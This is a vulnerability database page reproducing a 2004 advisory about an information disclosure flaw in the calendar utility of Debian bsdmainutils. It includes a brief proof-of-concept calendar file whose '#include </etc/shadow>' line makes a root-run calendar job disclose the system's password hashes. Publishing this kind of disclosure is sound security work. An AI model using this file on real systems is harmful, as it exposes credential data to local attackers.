Vulners
Lucene search
Debian bsdmainutils 6.0.14 - Calendar Information Disclosure
// source: https://www.securityfocus.com/bid/11077/info
The calendar utility contained in the bsdmainutils package on Debian GNU/Linux systems is reported susceptible to an information disclosure vulnerability. This is due to a lack of proper file authorization checks by the application.
The application fails to enforce permissions of included files when run as the superuser with the '-a' argument, therefore it is possible for a local attacker to create a calendar file that will disclose the contents of arbitrary, potentially sensitive files. This may aid them in further attacks against the affected computer.
By default, the package is installed with a crontab file that will not call the calendar utility. Systems are only affected if the crontab is enabled by administrators.
Debian GNU/Linux computers with bsdmainutils versions prior to 6.0.15 are reported to be vulnerable.
#define root Jun. 28<tab>cut_here
#include </etc/shadow>
Jun. 28<tab>Birthday of Steven Van Acker
Aug. 19<tab>Birthday of Andrew Griffith
(where <tab> should be replaced by an actual Tab character) Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2004 00:00Current
7.4High risk
Vulners AI Score7.4